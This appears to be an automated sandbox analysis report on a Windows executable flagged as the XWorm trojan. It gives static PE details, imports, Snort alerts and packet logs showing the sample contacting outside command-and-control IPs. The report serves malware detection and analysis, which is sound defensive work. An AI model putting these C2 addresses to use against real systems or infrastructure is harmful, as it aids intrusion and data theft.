SSDEEP:	3072:JPl4G474Poo9JkbXjEU+QVUjsbC8g2SbAe4ZQeAnuTCt2xbzmyoaq6rcYsc8kOeu:JPW745r2XgUsjsbIZnjZ2x4
TLSH:	F4345B92F6C0D4B6D8170175983ACEB2126BBE798974110B36E9372F5EB72831937E07
File Content Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......A.q>...m...m...mj..m...mj..m...m...m...m...m_..mj..m1..mj..m...mj..m...mRich...m........PE..L....b.f.................v...T.....

File Icon


Icon Hash:	20246c0c56e20926

Static PE Info

General

Entrypoint:	0x405b41
Entrypoint Section:	.text
Digitally signed:	false
Imagebase:	0x400000
Subsystem:	windows gui
Image File Characteristics:	EXECUTABLE_IMAGE, 32BIT_MACHINE
DLL Characteristics:	DYNAMIC_BASE, NX_COMPAT, TERMINAL_SERVER_AWARE
Time Stamp:	0x668362B3 [Tue Jul 2 02:15:15 2024 UTC]
TLS Callbacks:
CLR (.Net) Version:
OS Version Major:	5
OS Version Minor:	1
File Version Major:	5
File Version Minor:	1
Subsystem Version Major:	5
Subsystem Version Minor:	1
Import Hash:	0b47c746b58dc722dcec07246158fda2

Entrypoint Preview

Instruction
call 00007F62F0CF6975h
jmp 00007F62F0CEF44Eh
mov edi, edi
push ebp
mov ebp, esp
mov eax, dword ptr [ebp+08h]
test eax, eax
je 00007F62F0CEF5D4h
sub eax, 08h
cmp dword ptr [eax], 0000DDDDh
jne 00007F62F0CEF5C9h
push eax
call 00007F62F0CEDEAFh
pop ecx
pop ebp
ret
mov edi, edi
push ebp
mov ebp, esp
mov eax, dword ptr [ebp+08h]
push esi
mov esi, ecx
mov byte ptr [esi+0Ch], 00000000h
test eax, eax
jne 00007F62F0CEF625h
call 00007F62F0CF31DEh
mov dword ptr [esi+08h], eax
mov ecx, dword ptr [eax+6Ch]
mov dword ptr [esi], ecx
mov ecx, dword ptr [eax+68h]
mov dword ptr [esi+04h], ecx
mov ecx, dword ptr [esi]
cmp ecx, dword ptr [004201F8h]
je 00007F62F0CEF5D4h
mov ecx, dword ptr [0041FFB0h]
test dword ptr [eax+70h], ecx
jne 00007F62F0CEF5C9h
call 00007F62F0CF734Fh
mov dword ptr [esi], eax
mov eax, dword ptr [esi+04h]
cmp eax, dword ptr [0041FEB8h]
je 00007F62F0CEF5D8h
mov eax, dword ptr [esi+08h]
mov ecx, dword ptr [0041FFB0h]
test dword ptr [eax+70h], ecx
jne 00007F62F0CEF5CAh
call 00007F62F0CF6BAEh
mov dword ptr [esi+04h], eax
mov eax, dword ptr [esi+08h]
test byte ptr [eax+70h], 00000002h
jne 00007F62F0CEF5D6h
or dword ptr [eax+70h], 02h
mov byte ptr [esi+0Ch], 00000001h
jmp 00007F62F0CEF5CCh
mov ecx, dword ptr [eax]
mov dword ptr [esi], ecx
mov eax, dword ptr [eax+04h]
mov dword ptr [esi+04h], eax
mov eax, esi
pop esi
pop ebp
retn 0004h
mov edi, edi
push ebp
mov ebp, esp
sub esp, 10h
mov eax, dword ptr [0041F920h]
xor eax, ebp
mov dword ptr [ebp-04h], eax
mov edx, dword ptr [ebp+18h]
push ebx

Rich Headers

Programming Language:

[ASM] VS2010 build 30319
[ C ] VS2010 build 30319
[IMP] VS2008 SP1 build 30729
[C++] VS2010 build 30319
[RES] VS2010 build 30319
[LNK] VS2010 build 30319

Data Directories

Name	Virtual Address	Virtual Size	Is in Section
IMAGE_DIRECTORY_ENTRY_EXPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_IMPORT	0x1d95c	0x3c	.rdata
IMAGE_DIRECTORY_ENTRY_RESOURCE	0x23000	0x1c748	.rsrc
IMAGE_DIRECTORY_ENTRY_EXCEPTION	0x0	0x0
IMAGE_DIRECTORY_ENTRY_SECURITY	0x0	0x0
IMAGE_DIRECTORY_ENTRY_BASERELOC	0x40000	0x138c	.reloc
IMAGE_DIRECTORY_ENTRY_DEBUG	0x0	0x0
IMAGE_DIRECTORY_ENTRY_COPYRIGHT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_GLOBALPTR	0x0	0x0
IMAGE_DIRECTORY_ENTRY_TLS	0x0	0x0
IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG	0x1c368	0x40	.rdata
IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_IAT	0x19000	0x150	.rdata
IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR	0x0	0x0
IMAGE_DIRECTORY_ENTRY_RESERVED	0x0	0x0

Sections

Name	Virtual Address	Virtual Size	Raw Size	MD5	Xored PE	ZLIB Complexity	File Type	Entropy	Characteristics
.text	0x1000	0x17548	0x17600	2832193bc838d3749cda385130dee996	False	0.5840261530748663	data	6.643994573279363	IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
.rdata	0x19000	0x50e0	0x5200	f70895b146c7db1f8f77e00dd643556f	False	0.35980373475609756	data	4.92490653021865	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.data	0x1f000	0x37c4	0x1a00	268250434fbffdf0a4bf9cf4a64d29c5	False	0.3167067307692308	data	3.867957401461582	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.rsrc	0x23000	0x1c748	0x1c800	13c7e8b4f8049f0b57e98c87b62e9647	False	0.2745768229166667	data	4.800930470827677	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.reloc	0x40000	0x1e2c	0x2000	061df8fc06366d9ad70b17618c2ca63b	False	0.482666015625	data	4.816108713673021	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ

Resources

Name	RVA	Size	Type	Language	Country	ZLIB Complexity
RT_ICON	0x233a0	0x668	Device independent bitmap graphic, 48 x 96 x 4, image size 1152	Chinese	China	0.2554878048780488
RT_ICON	0x23a08	0x2e8	Device independent bitmap graphic, 32 x 64 x 4, image size 512	Chinese	China	0.3602150537634409
RT_ICON	0x23cf0	0x1e8	Device independent bitmap graphic, 24 x 48 x 4, image size 288	Chinese	China	0.39344262295081966
RT_ICON	0x23ed8	0x128	Device independent bitmap graphic, 16 x 32 x 4, image size 128	Chinese	China	0.4358108108108108
RT_ICON	0x24000	0xea8	Device independent bitmap graphic, 48 x 96 x 8, image size 2304, 256 important colors	Chinese	China	0.4986673773987207
RT_ICON	0x24ea8	0x8a8	Device independent bitmap graphic, 32 x 64 x 8, image size 1024, 256 important colors	Chinese	China	0.5888989169675091
RT_ICON	0x25750	0x6c8	Device independent bitmap graphic, 24 x 48 x 8, image size 576, 256 important colors	Chinese	China	0.548963133640553
RT_ICON	0x25e18	0x568	Device independent bitmap graphic, 16 x 32 x 8, image size 256, 256 important colors	Chinese	China	0.40534682080924855
RT_ICON	0x26380	0x10828	Device independent bitmap graphic, 128 x 256 x 32, image size 67584	Chinese	China	0.18236129184904767
RT_ICON	0x36ba8	0x4228	Device independent bitmap graphic, 64 x 128 x 32, image size 16896	Chinese	China	0.3425838450637695
RT_ICON	0x3add0	0x25a8	Device independent bitmap graphic, 48 x 96 x 32, image size 9600	Chinese	China	0.3924273858921162
RT_ICON	0x3d378	0x10a8	Device independent bitmap graphic, 32 x 64 x 32, image size 4224	Chinese	China	0.49953095684803
RT_ICON	0x3e420	0x988	Device independent bitmap graphic, 24 x 48 x 32, image size 2400	Chinese	China	0.580327868852459
RT_ICON	0x3eda8	0x468	Device independent bitmap graphic, 16 x 32 x 32, image size 1088	Chinese	China	0.6906028368794326
RT_GROUP_ICON	0x3f210	0xca	data	Chinese	China	0.6089108910891089
RT_VERSION	0x3f2dc	0x304	data	Chinese	China	0.43134715025906734
RT_MANIFEST	0x3f5e0	0x165	ASCII text, with CRLF line terminators	English	United States	0.5434173669467787

Imports

DLL

Import

KERNEL32.dll

CloseHandle, ReadFile, VirtualAlloc, GetFileSize, CreateFileA, Sleep, GetTickCount64, VirtualFree, SetEndOfFile, CreateFileW, SetStdHandle, WriteConsoleW, LoadLibraryW, IsValidLocale, InterlockedIncrement, InterlockedDecrement, InitializeCriticalSection, DeleteCriticalSection, EnterCriticalSection, LeaveCriticalSection, EncodePointer, DecodePointer, GetSystemTimeAsFileTime, GetLastError, HeapFree, RaiseException, RtlUnwind, GetCommandLineA, HeapSetInformation, GetStartupInfoW, WideCharToMultiByte, LCMapStringW, MultiByteToWideChar, GetCPInfo, HeapAlloc, IsProcessorFeaturePresent, TlsAlloc, TlsGetValue, TlsSetValue, TlsFree, GetModuleHandleW, SetLastError, GetCurrentThreadId, GetProcAddress, UnhandledExceptionFilter, SetUnhandledExceptionFilter, IsDebuggerPresent, TerminateProcess, GetCurrentProcess, HeapCreate, SetHandleCount, GetStdHandle, InitializeCriticalSectionAndSpinCount, GetFileType, ExitProcess, WriteFile, GetConsoleCP, GetConsoleMode, FlushFileBuffers, SetFilePointer, GetModuleFileNameW, GetModuleFileNameA, FreeEnvironmentStringsW, GetEnvironmentStringsW, QueryPerformanceCounter, GetTickCount, GetCurrentProcessId, GetACP, GetOEMCP, IsValidCodePage, GetStringTypeW, GetLocaleInfoW, HeapReAlloc, HeapSize, GetUserDefaultLCID, GetLocaleInfoA, EnumSystemLocalesA, GetProcessHeap

WININET.dll

InternetCloseHandle, InternetReadFile, InternetOpenUrlA, InternetOpenA

Possible Origin

Language of compilation system	Country where language is spoken	Map
Chinese	China
English	United States

Network Behavior

Snort IDS Alerts

Timestamp	Protocol	SID	Message	Source Port	Dest Port	Source IP	Dest IP
07/02/24-19:26:55.721304	TCP	2852874	ETPRO TROJAN Win32/XWorm CnC PING Command Inbound M2	7000	49706	156.238.235.31	192.168.2.8
07/02/24-19:27:04.946686	TCP	2852870	ETPRO TROJAN Win32/XWorm CnC Checkin - Generic Prefix Bytes	7000	49706	156.238.235.31	192.168.2.8
07/02/24-19:23:17.813584	TCP	2855924	ETPRO TROJAN Win32/XWorm V3 CnC Command - PING Outbound	49706	7000	192.168.2.8	156.238.235.31
07/02/24-19:27:04.947576	TCP	2852923	ETPRO TROJAN Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client)	49706	7000	192.168.2.8	156.238.235.31
07/02/24-19:24:43.950928	TCP	2853193	ETPRO TROJAN Win32/XWorm V3 CnC Command - PING Outbound	49706	7000	192.168.2.8	156.238.235.31

Network Port Distribution

TCP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Jul 2, 2024 19:22:59.991139889 CEST	49705	881	192.168.2.8	91.208.240.157
Jul 2, 2024 19:22:59.995907068 CEST	881	49705	91.208.240.157	192.168.2.8
Jul 2, 2024 19:22:59.996006966 CEST	49705	881	192.168.2.8	91.208.240.157
Jul 2, 2024 19:22:59.996233940 CEST	49705	881	192.168.2.8	91.208.240.157
Jul 2, 2024 19:23:00.001029015 CEST	881	49705	91.208.240.157	192.168.2.8
Jul 2, 2024 19:23:00.946445942 CEST	881	49705	91.208.240.157	192.168.2.8
Jul 2, 2024 19:23:00.946461916 CEST	881	49705	91.208.240.157	192.168.2.8
Jul 2, 2024 19:23:00.946474075 CEST	881	49705	91.208.240.157	192.168.2.8
Jul 2, 2024 19:23:00.946486950 CEST	881	49705	91.208.240.157	192.168.2.8
Jul 2, 2024 19:23:00.946496010 CEST	881	49705	91.208.240.157	192.168.2.8
Jul 2, 2024 19:23:00.946511030 CEST	49705	881	192.168.2.8	91.208.240.157
Jul 2, 2024 19:23:00.946526051 CEST	881	49705	91.208.240.157	192.168.2.8
Jul 2, 2024 19:23:00.946537971 CEST	881	49705	91.208.240.157	192.168.2.8
Jul 2, 2024 19:23:00.946623087 CEST	881	49705	91.208.240.157	192.168.2.8
Jul 2, 2024 19:23:00.946633101 CEST	881	49705	91.208.240.157	192.168.2.8
Jul 2, 2024 19:23:00.946641922 CEST	881	49705	91.208.240.157	192.168.2.8
Jul 2, 2024 19:23:00.946675062 CEST	49705	881	192.168.2.8	91.208.240.157
Jul 2, 2024 19:23:00.946675062 CEST	49705	881	192.168.2.8	91.208.240.157
Jul 2, 2024 19:23:00.946675062 CEST	49705	881	192.168.2.8	91.208.240.157
Jul 2, 2024 19:23:00.946690083 CEST	49705	881	192.168.2.8	91.208.240.157
Jul 2, 2024 19:23:00.951334953 CEST	881	49705	91.208.240.157	192.168.2.8
Jul 2, 2024 19:23:00.951347113 CEST	881	49705	91.208.240.157	192.168.2.8
Jul 2, 2024 19:23:00.951358080 CEST	881	49705	91.208.240.157	192.168.2.8
Jul 2, 2024 19:23:00.951406002 CEST	49705	881	192.168.2.8	91.208.240.157
Jul 2, 2024 19:23:00.951438904 CEST	49705	881	192.168.2.8	91.208.240.157
Jul 2, 2024 19:23:01.302073956 CEST	881	49705	91.208.240.157	192.168.2.8
Jul 2, 2024 19:23:01.302087069 CEST	881	49705	91.208.240.157	192.168.2.8
Jul 2, 2024 19:23:01.302098989 CEST	881	49705	91.208.240.157	192.168.2.8
Jul 2, 2024 19:23:01.302146912 CEST	49705	881	192.168.2.8	91.208.240.157
Jul 2, 2024 19:23:01.302165031 CEST	49705	881	192.168.2.8	91.208.240.157
Jul 2, 2024 19:23:01.302506924 CEST	881	49705	91.208.240.157	192.168.2.8
Jul 2, 2024 19:23:01.302519083 CEST	881	49705	91.208.240.157	192.168.2.8
Jul 2, 2024 19:23:01.302530050 CEST	881	49705	91.208.240.157	192.168.2.8
Jul 2, 2024 19:23:01.302540064 CEST	881	49705	91.208.240.157	192.168.2.8
Jul 2, 2024 19:23:01.302551031 CEST	881	49705	91.208.240.157	192.168.2.8
Jul 2, 2024 19:23:01.302560091 CEST	49705	881	192.168.2.8	91.208.240.157
Jul 2, 2024 19:23:01.302576065 CEST	49705	881	192.168.2.8	91.208.240.157
Jul 2, 2024 19:23:01.302583933 CEST	881	49705	91.208.240.157	192.168.2.8
Jul 2, 2024 19:23:01.302603960 CEST	49705	881	192.168.2.8	91.208.240.157
Jul 2, 2024 19:23:01.302612066 CEST	881	49705	91.208.240.157	192.168.2.8
Jul 2, 2024 19:23:01.302618980 CEST	49705	881	192.168.2.8	91.208.240.157
Jul 2, 2024 19:23:01.302628994 CEST	881	49705	91.208.240.157	192.168.2.8
Jul 2, 2024 19:23:01.302639008 CEST	881	49705	91.208.240.157	192.168.2.8
Jul 2, 2024 19:23:01.302645922 CEST	49705	881	192.168.2.8	91.208.240.157
Jul 2, 2024 19:23:01.302658081 CEST	881	49705	91.208.240.157	192.168.2.8
Jul 2, 2024 19:23:01.302664042 CEST	49705	881	192.168.2.8	91.208.240.157
Jul 2, 2024 19:23:01.302675009 CEST	49705	881	192.168.2.8	91.208.240.157
Jul 2, 2024 19:23:01.302684069 CEST	881	49705	91.208.240.157	192.168.2.8
Jul 2, 2024 19:23:01.302690983 CEST	49705	881	192.168.2.8	91.208.240.157
Jul 2, 2024 19:23:01.302699089 CEST	881	49705	91.208.240.157	192.168.2.8
Jul 2, 2024 19:23:01.302710056 CEST	881	49705	91.208.240.157	192.168.2.8
Jul 2, 2024 19:23:01.302719116 CEST	49705	881	192.168.2.8	91.208.240.157
Jul 2, 2024 19:23:01.302730083 CEST	881	49705	91.208.240.157	192.168.2.8
Jul 2, 2024 19:23:01.302740097 CEST	49705	881	192.168.2.8	91.208.240.157
Jul 2, 2024 19:23:01.302747011 CEST	49705	881	192.168.2.8	91.208.240.157
Jul 2, 2024 19:23:01.302755117 CEST	881	49705	91.208.240.157	192.168.2.8
Jul 2, 2024 19:23:01.302762985 CEST	49705	881	192.168.2.8	91.208.240.157
Jul 2, 2024 19:23:01.302772045 CEST	881	49705	91.208.240.157	192.168.2.8
Jul 2, 2024 19:23:01.302784920 CEST	881	49705	91.208.240.157	192.168.2.8
Jul 2, 2024 19:23:01.302789927 CEST	49705	881	192.168.2.8	91.208.240.157
Jul 2, 2024 19:23:01.302799940 CEST	49705	881	192.168.2.8	91.208.240.157
Jul 2, 2024 19:23:01.302805901 CEST	881	49705	91.208.240.157	192.168.2.8
Jul 2, 2024 19:23:01.302815914 CEST	49705	881	192.168.2.8	91.208.240.157
Jul 2, 2024 19:23:01.302836895 CEST	49705	881	192.168.2.8	91.208.240.157
Jul 2, 2024 19:23:01.302856922 CEST	881	49705	91.208.240.157	192.168.2.8
Jul 2, 2024 19:23:01.302867889 CEST	881	49705	91.208.240.157	192.168.2.8
Jul 2, 2024 19:23:01.302881002 CEST	881	49705	91.208.240.157	192.168.2.8
Jul 2, 2024 19:23:01.302889109 CEST	49705	881	192.168.2.8	91.208.240.157
Jul 2, 2024 19:23:01.302906036 CEST	49705	881	192.168.2.8	91.208.240.157
Jul 2, 2024 19:23:01.302922964 CEST	49705	881	192.168.2.8	91.208.240.157
Jul 2, 2024 19:23:01.307363987 CEST	881	49705	91.208.240.157	192.168.2.8
Jul 2, 2024 19:23:01.307429075 CEST	49705	881	192.168.2.8	91.208.240.157
Jul 2, 2024 19:23:01.421938896 CEST	881	49705	91.208.240.157	192.168.2.8
Jul 2, 2024 19:23:01.421956062 CEST	881	49705	91.208.240.157	192.168.2.8
Jul 2, 2024 19:23:01.421972036 CEST	881	49705	91.208.240.157	192.168.2.8
Jul 2, 2024 19:23:01.421982050 CEST	881	49705	91.208.240.157	192.168.2.8
Jul 2, 2024 19:23:01.421993971 CEST	881	49705	91.208.240.157	192.168.2.8
Jul 2, 2024 19:23:01.422005892 CEST	881	49705	91.208.240.157	192.168.2.8
Jul 2, 2024 19:23:01.422018051 CEST	49705	881	192.168.2.8	91.208.240.157
Jul 2, 2024 19:23:01.422070980 CEST	49705	881	192.168.2.8	91.208.240.157
Jul 2, 2024 19:23:01.422331095 CEST	881	49705	91.208.240.157	192.168.2.8
Jul 2, 2024 19:23:01.422377110 CEST	49705	881	192.168.2.8	91.208.240.157
Jul 2, 2024 19:23:01.422416925 CEST	881	49705	91.208.240.157	192.168.2.8
Jul 2, 2024 19:23:01.422460079 CEST	49705	881	192.168.2.8	91.208.240.157
Jul 2, 2024 19:23:01.422491074 CEST	881	49705	91.208.240.157	192.168.2.8
Jul 2, 2024 19:23:01.422502995 CEST	881	49705	91.208.240.157	192.168.2.8
Jul 2, 2024 19:23:01.422513962 CEST	881	49705	91.208.240.157	192.168.2.8
Jul 2, 2024 19:23:01.422532082 CEST	49705	881	192.168.2.8	91.208.240.157
Jul 2, 2024 19:23:01.422549963 CEST	49705	881	192.168.2.8	91.208.240.157
Jul 2, 2024 19:23:01.422600985 CEST	881	49705	91.208.240.157	192.168.2.8
Jul 2, 2024 19:23:01.422611952 CEST	881	49705	91.208.240.157	192.168.2.8
Jul 2, 2024 19:23:01.422641039 CEST	49705	881	192.168.2.8	91.208.240.157
Jul 2, 2024 19:23:01.422657013 CEST	49705	881	192.168.2.8	91.208.240.157
Jul 2, 2024 19:23:01.423424006 CEST	881	49705	91.208.240.157	192.168.2.8
Jul 2, 2024 19:23:01.423476934 CEST	881	49705	91.208.240.157	192.168.2.8
Jul 2, 2024 19:23:01.423486948 CEST	881	49705	91.208.240.157	192.168.2.8
Jul 2, 2024 19:23:01.423494101 CEST	49705	881	192.168.2.8	91.208.240.157
Jul 2, 2024 19:23:01.423511028 CEST	49705	881	192.168.2.8	91.208.240.157
Jul 2, 2024 19:23:01.423537016 CEST	49705	881	192.168.2.8	91.208.240.157
Jul 2, 2024 19:23:01.423566103 CEST	881	49705	91.208.240.157	192.168.2.8
Jul 2, 2024 19:23:01.423576117 CEST	881	49705	91.208.240.157	192.168.2.8
Jul 2, 2024 19:23:01.423588991 CEST	881	49705	91.208.240.157	192.168.2.8
Jul 2, 2024 19:23:01.423614025 CEST	49705	881	192.168.2.8	91.208.240.157
Jul 2, 2024 19:23:01.423630953 CEST	49705	881	192.168.2.8	91.208.240.157
Jul 2, 2024 19:23:01.424340963 CEST	881	49705	91.208.240.157	192.168.2.8
Jul 2, 2024 19:23:01.424387932 CEST	881	49705	91.208.240.157	192.168.2.8
Jul 2, 2024 19:23:01.424401045 CEST	881	49705	91.208.240.157	192.168.2.8
Jul 2, 2024 19:23:01.424407959 CEST	49705	881	192.168.2.8	91.208.240.157
Jul 2, 2024 19:23:01.424422979 CEST	49705	881	192.168.2.8	91.208.240.157
Jul 2, 2024 19:23:01.424436092 CEST	49705	881	192.168.2.8	91.208.240.157
Jul 2, 2024 19:23:01.424448967 CEST	881	49705	91.208.240.157	192.168.2.8
Jul 2, 2024 19:23:01.424465895 CEST	881	49705	91.208.240.157	192.168.2.8
Jul 2, 2024 19:23:01.424504995 CEST	49705	881	192.168.2.8	91.208.240.157
Jul 2, 2024 19:23:01.425235987 CEST	49705	881	192.168.2.8	91.208.240.157
Jul 2, 2024 19:23:05.107872009 CEST	49706	7000	192.168.2.8	156.238.235.31
Jul 2, 2024 19:23:05.113145113 CEST	7000	49706	156.238.235.31	192.168.2.8
Jul 2, 2024 19:23:05.113220930 CEST	49706	7000	192.168.2.8	156.238.235.31
Jul 2, 2024 19:23:05.652075052 CEST	49706	7000	192.168.2.8	156.238.235.31
Jul 2, 2024 19:23:05.658193111 CEST	7000	49706	156.238.235.31	192.168.2.8
Jul 2, 2024 19:23:17.813584089 CEST	49706	7000	192.168.2.8	156.238.235.31
Jul 2, 2024 19:23:18.085616112 CEST	7000	49706	156.238.235.31	192.168.2.8
Jul 2, 2024 19:23:18.387418985 CEST	7000	49706	156.238.235.31	192.168.2.8
Jul 2, 2024 19:23:18.434319019 CEST	49706	7000	192.168.2.8	156.238.235.31
Jul 2, 2024 19:23:18.719752073 CEST	49706	7000	192.168.2.8	156.238.235.31
Jul 2, 2024 19:23:18.725368977 CEST	7000	49706	156.238.235.31	192.168.2.8
Jul 2, 2024 19:23:25.682087898 CEST	7000	49706	156.238.235.31	192.168.2.8
Jul 2, 2024 19:23:25.731236935 CEST	49706	7000	192.168.2.8	156.238.235.31
Jul 2, 2024 19:23:29.981570959 CEST	49706	7000	192.168.2.8	156.238.235.31
Jul 2, 2024 19:23:29.986515999 CEST	7000	49706	156.238.235.31	192.168.2.8
Jul 2, 2024 19:23:30.286210060 CEST	7000	49706	156.238.235.31	192.168.2.8
Jul 2, 2024 19:23:30.288188934 CEST	49706	7000	192.168.2.8	156.238.235.31
Jul 2, 2024 19:23:30.292913914 CEST	7000	49706	156.238.235.31	192.168.2.8
Jul 2, 2024 19:23:42.153372049 CEST	49706	7000	192.168.2.8	156.238.235.31
Jul 2, 2024 19:23:42.465631962 CEST	49706	7000	192.168.2.8	156.238.235.31
Jul 2, 2024 19:23:42.877859116 CEST	7000	49706	156.238.235.31	192.168.2.8
Jul 2, 2024 19:23:42.877876997 CEST	7000	49706	156.238.235.31	192.168.2.8
Jul 2, 2024 19:23:43.177283049 CEST	7000	49706	156.238.235.31	192.168.2.8
Jul 2, 2024 19:23:43.180020094 CEST	49706	7000	192.168.2.8	156.238.235.31
Jul 2, 2024 19:23:43.184878111 CEST	7000	49706	156.238.235.31	192.168.2.8
Jul 2, 2024 19:23:54.325288057 CEST	49706	7000	192.168.2.8	156.238.235.31
Jul 2, 2024 19:23:54.330372095 CEST	7000	49706	156.238.235.31	192.168.2.8
Jul 2, 2024 19:23:54.652184010 CEST	7000	49706	156.238.235.31	192.168.2.8
Jul 2, 2024 19:23:54.654565096 CEST	49706	7000	192.168.2.8	156.238.235.31
Jul 2, 2024 19:23:54.659383059 CEST	7000	49706	156.238.235.31	192.168.2.8
Jul 2, 2024 19:23:55.659696102 CEST	7000	49706	156.238.235.31	192.168.2.8
Jul 2, 2024 19:23:55.700001001 CEST	49706	7000	192.168.2.8	156.238.235.31
Jul 2, 2024 19:24:06.425262928 CEST	881	49705	91.208.240.157	192.168.2.8
Jul 2, 2024 19:24:06.425389051 CEST	49705	881	192.168.2.8	91.208.240.157
Jul 2, 2024 19:24:06.497422934 CEST	49706	7000	192.168.2.8	156.238.235.31
Jul 2, 2024 19:24:06.502285004 CEST	7000	49706	156.238.235.31	192.168.2.8
Jul 2, 2024 19:24:06.807269096 CEST	7000	49706	156.238.235.31	192.168.2.8
Jul 2, 2024 19:24:06.809983969 CEST	49706	7000	192.168.2.8	156.238.235.31
Jul 2, 2024 19:24:06.814826012 CEST	7000	49706	156.238.235.31	192.168.2.8
Jul 2, 2024 19:24:17.669141054 CEST	49706	7000	192.168.2.8	156.238.235.31
Jul 2, 2024 19:24:17.674427032 CEST	7000	49706	156.238.235.31	192.168.2.8
Jul 2, 2024 19:24:17.974517107 CEST	7000	49706	156.238.235.31	192.168.2.8
Jul 2, 2024 19:24:17.978669882 CEST	49706	7000	192.168.2.8	156.238.235.31
Jul 2, 2024 19:24:17.983838081 CEST	7000	49706	156.238.235.31	192.168.2.8
Jul 2, 2024 19:24:25.667812109 CEST	7000	49706	156.238.235.31	192.168.2.8
Jul 2, 2024 19:24:25.716942072 CEST	49706	7000	192.168.2.8	156.238.235.31
Jul 2, 2024 19:24:29.841072083 CEST	49706	7000	192.168.2.8	156.238.235.31
Jul 2, 2024 19:24:29.846110106 CEST	7000	49706	156.238.235.31	192.168.2.8
Jul 2, 2024 19:24:29.965981960 CEST	49706	7000	192.168.2.8	156.238.235.31
Jul 2, 2024 19:24:29.971129894 CEST	7000	49706	156.238.235.31	192.168.2.8
Jul 2, 2024 19:24:30.151529074 CEST	7000	49706	156.238.235.31	192.168.2.8
Jul 2, 2024 19:24:30.156148911 CEST	49706	7000	192.168.2.8	156.238.235.31
Jul 2, 2024 19:24:30.161011934 CEST	7000	49706	156.238.235.31	192.168.2.8
Jul 2, 2024 19:24:30.358733892 CEST	7000	49706	156.238.235.31	192.168.2.8
Jul 2, 2024 19:24:30.360450983 CEST	49706	7000	192.168.2.8	156.238.235.31
Jul 2, 2024 19:24:30.366384983 CEST	7000	49706	156.238.235.31	192.168.2.8
Jul 2, 2024 19:24:37.950642109 CEST	49706	7000	192.168.2.8	156.238.235.31
Jul 2, 2024 19:24:37.955559015 CEST	7000	49706	156.238.235.31	192.168.2.8
Jul 2, 2024 19:24:38.255681038 CEST	7000	49706	156.238.235.31	192.168.2.8
Jul 2, 2024 19:24:38.257930040 CEST	49706	7000	192.168.2.8	156.238.235.31
Jul 2, 2024 19:24:38.262753010 CEST	7000	49706	156.238.235.31	192.168.2.8
Jul 2, 2024 19:24:38.278716087 CEST	49706	7000	192.168.2.8	156.238.235.31
Jul 2, 2024 19:24:38.283634901 CEST	7000	49706	156.238.235.31	192.168.2.8
Jul 2, 2024 19:24:39.145371914 CEST	7000	49706	156.238.235.31	192.168.2.8
Jul 2, 2024 19:24:39.146814108 CEST	7000	49706	156.238.235.31	192.168.2.8
Jul 2, 2024 19:24:39.146862030 CEST	49706	7000	192.168.2.8	156.238.235.31
Jul 2, 2024 19:24:39.147449017 CEST	49706	7000	192.168.2.8	156.238.235.31
Jul 2, 2024 19:24:39.152283907 CEST	7000	49706	156.238.235.31	192.168.2.8
Jul 2, 2024 19:24:43.702933073 CEST	49706	7000	192.168.2.8	156.238.235.31
Jul 2, 2024 19:24:43.709467888 CEST	7000	49706	156.238.235.31	192.168.2.8
Jul 2, 2024 19:24:43.950927973 CEST	49706	7000	192.168.2.8	156.238.235.31
Jul 2, 2024 19:24:43.956299067 CEST	7000	49706	156.238.235.31	192.168.2.8
Jul 2, 2024 19:24:44.008140087 CEST	7000	49706	156.238.235.31	192.168.2.8
Jul 2, 2024 19:24:44.021699905 CEST	49706	7000	192.168.2.8	156.238.235.31
Jul 2, 2024 19:24:44.026808023 CEST	7000	49706	156.238.235.31	192.168.2.8
Jul 2, 2024 19:24:44.272063017 CEST	7000	49706	156.238.235.31	192.168.2.8
Jul 2, 2024 19:24:44.274032116 CEST	49706	7000	192.168.2.8	156.238.235.31
Jul 2, 2024 19:24:44.278929949 CEST	7000	49706	156.238.235.31	192.168.2.8
Jul 2, 2024 19:24:46.794173956 CEST	49706	7000	192.168.2.8	156.238.235.31
Jul 2, 2024 19:24:46.799113035 CEST	7000	49706	156.238.235.31	192.168.2.8
Jul 2, 2024 19:24:47.113542080 CEST	7000	49706	156.238.235.31	192.168.2.8
Jul 2, 2024 19:24:47.116076946 CEST	49706	7000	192.168.2.8	156.238.235.31
Jul 2, 2024 19:24:47.120932102 CEST	7000	49706	156.238.235.31	192.168.2.8
Jul 2, 2024 19:24:48.560273886 CEST	49706	7000	192.168.2.8	156.238.235.31
Jul 2, 2024 19:24:48.565360069 CEST	7000	49706	156.238.235.31	192.168.2.8
Jul 2, 2024 19:24:48.606879950 CEST	49706	7000	192.168.2.8	156.238.235.31
Jul 2, 2024 19:24:48.611761093 CEST	7000	49706	156.238.235.31	192.168.2.8
Jul 2, 2024 19:24:48.731966972 CEST	49706	7000	192.168.2.8	156.238.235.31
Jul 2, 2024 19:24:48.736819029 CEST	7000	49706	156.238.235.31	192.168.2.8
Jul 2, 2024 19:24:48.911901951 CEST	7000	49706	156.238.235.31	192.168.2.8
Jul 2, 2024 19:24:48.914133072 CEST	49706	7000	192.168.2.8	156.238.235.31
Jul 2, 2024 19:24:48.919294119 CEST	7000	49706	156.238.235.31	192.168.2.8
Jul 2, 2024 19:24:49.336723089 CEST	7000	49706	156.238.235.31	192.168.2.8
Jul 2, 2024 19:24:49.339853048 CEST	49706	7000	192.168.2.8	156.238.235.31
Jul 2, 2024 19:24:49.344671011 CEST	7000	49706	156.238.235.31	192.168.2.8
Jul 2, 2024 19:24:49.351239920 CEST	7000	49706	156.238.235.31	192.168.2.8
Jul 2, 2024 19:24:49.353641033 CEST	49706	7000	192.168.2.8	156.238.235.31
